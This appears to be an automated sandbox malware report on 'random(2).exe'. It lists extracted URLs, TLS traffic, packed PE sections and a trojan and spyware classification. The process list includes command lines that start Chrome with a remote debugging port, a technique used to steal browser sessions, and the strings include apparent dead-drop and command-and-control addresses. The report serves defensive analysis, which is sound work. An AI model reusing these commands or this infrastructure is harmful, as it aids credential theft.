Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 0000000C.00000003.2376583988.00003CC8005DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 0000000C.00000002.6005702865.00003CCC001AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 0000000C.00000003.2368131775.00005790000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2440856608.00001D70000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2441975397.0000019852A38000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2910763752.00004AC8000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2913446931.00000151EF2A9000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.3483222228.00001028000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.3484917203.000002C188C08000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.3617596899.00004718000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.3949682834.00006E08000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.4389139326.00003DE0000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.4390386867.000001E34F488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 0000000C.00000002.6005702865.00003CCC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5946881406.00003CCC00174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: wt26ph.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
Source: wt26ph.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: chrome.exe, 0000000C.00000002.6598026417.00003CCC00550000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
Source: chrome.exe, 0000000C.00000003.2420626371.00003CCC01898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2420162161.00003CCC01848000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2420798445.00003CCC017AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.google.com/icons?selected=Material
Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/glic/intro?20
Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/glic2
Source: chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 0000000C.00000003.2376583988.00003CC8005DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 0000000C.00000003.2376583988.00003CC8005DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 0000000C.00000003.2376583988.00003CC8005DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Pre
Source: chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 0000000C.00000002.5771387251.00003CCC00004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: wt26ph.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 0000000C.00000003.2419271192.00003CCC0176C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/gen204
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 0000000C.00000002.5805027972.00003CCC00068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 0000000C.00000003.2414667869.00003CCC00B50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 0000000C.00000003.2414667869.00003CCC00B50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 0000000C.00000003.2414667869.00003CCC00B50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 0000000C.00000002.6005702865.00003CCC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2414667869.00003CCC00B50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 0000000C.00000003.2414667869.00003CCC00B50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 0000000C.00000003.2419271192.00003CCC0176C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2418998130.00003CCC0174C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.office.com/calendar/
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://people.googleapis.com/
Source: chrome.exe, 0000000C.00000002.6598026417.00003CCC00550000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 0000000C.00000002.5864508558.00003CCC0011C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5817119523.00003CCC00094000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyA2KlwBX3mkFo30om9LU
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 0000000C.00000002.6206613229.00003CCC002D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.google.cmanager.com
Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199832267488
Source: random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199832267488dqu220Mozilla/5.0
Source: random(2).exe, 00000000.00000003.1079632033.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079609497.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000B73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/g_etcontent
Source: random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/g_etcontentdqu220Mozilla/5.0
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: random(2).exe, 00000000.00000003.1079632033.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1096240844.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1110484696.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: wt26ph.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 0000000C.00000003.2415297744.00003CCC01614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 0000000C.00000002.5871320655.00003CCC00128000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl
Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 0000000C.00000002.6585183116.00003CCC0053D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: wt26ph.0.dr	String found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
Source: random(2).exe, 00000000.00000003.1079632033.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://y.p.formaxprime.co.uk
Source: random(2).exe, 00000000.00000003.1096240844.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1110484696.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://y.p.formaxprime.co.uk/
Source: random(2).exe, 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://y.p.formaxprime.co.uk//
Source: random(2).exe, 00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://y.p.formaxprime.co.uk/5
Source: random(2).exe, 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://y.p.formaxprime.co.uk/G
Source: random(2).exe, 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1096240844.0000000000B76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://y.p.formaxprime.co.uk/a
Source: random(2).exe, 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://y.p.formaxprime.co.uk/j
Source: random(2).exe, 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://y.p.formaxprime.co.uk/m
Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://y.p.formaxprime.co.ukK
Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://y.p.formaxprime.co.ukZ
Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://y.p.formaxprime.co.ukb
Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://y.p.formaxprime.co.ukg
Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://y.p.formaxprime.co.ukq
Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://y.p.formaxprime.co.ukv

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.10:49681 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.10:49682 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: random(2).exe	Static PE information: section name:
Source: random(2).exe	Static PE information: section name: .idata
Source: random(2).exe	Static PE information: section name:

Source: C:\Users\user\Desktop\random(2).exe

Process Stats: CPU usage > 49%

Source: random(2).exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: random(2).exe	Static PE information: Section: ZLIB complexity 0.9982289459745762
Source: random(2).exe	Static PE information: Section: xyhrtgkn ZLIB complexity 0.9948176319648094

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@34/1@4/4

Source: C:\Users\user\Desktop\random(2).exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\F0CK4TZV.htm

Jump to behavior

Source: C:\Users\user\Desktop\random(2).exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: random(2).exe	Virustotal: Detection: 50%
Source: random(2).exe	ReversingLabs: Detection: 58%

Source: unknown	Process created: C:\Users\user\Desktop\random(2).exe "C:\Users\user\Desktop\random(2).exe"
Source: C:\Users\user\Desktop\random(2).exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2296,i,9997688068787143346,17471011568796092826,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2464 /prefetch:3
Source: C:\Users\user\Desktop\random(2).exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\Desktop\random(2).exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\Desktop\random(2).exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\Desktop\random(2).exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\Desktop\random(2).exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\Desktop\random(2).exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\Desktop\random(2).exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2296,i,9997688068787143346,17471011568796092826,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2464 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\random(2).exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: iphlpapi.dll	Jump to behavior
